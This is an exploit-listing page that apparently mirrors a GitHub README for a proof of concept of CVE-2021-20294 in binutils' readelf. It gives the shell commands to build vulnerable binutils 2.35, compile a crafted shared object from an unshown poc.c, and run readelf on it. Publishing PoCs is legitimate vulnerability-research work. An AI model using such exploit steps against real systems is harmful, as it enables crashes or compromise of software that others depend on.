Sploitus

Exploit for CVE-2021-20294-POC

kitploit Β· 2026-09-11

Exploit Code

MARKDOWN28 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TIN-Z-CVE-2021-20294-POC
# CVE-2021-20294-POC

> Jan 21 2023, Altin (tin-z), github.com/tin-z

### Poc

  * download and compile



root@kitploit:~
    
    
    wget https://ftp.gnu.org/gnu/binutils/binutils-2.35.tar.gz && tar -xzvf binutils-2.35.tar.gz
    cd binutils-2.35 && ./configure && make && cd ..
    gcc -shared -fPIC poc.c -o poc.so -Wl,--version-script=poc.ver
    

  * launch the poc `./binutils-2.35/binutils/readelf -s poc.so`



![t1.jpg](https://assets.kitploit.com/production/public/readmes/33569/1ac664b7228d2e9f90563be18847120b2e2dc06ecada6da0640b3b08dbd15f24.jpg)

### details

  * details.md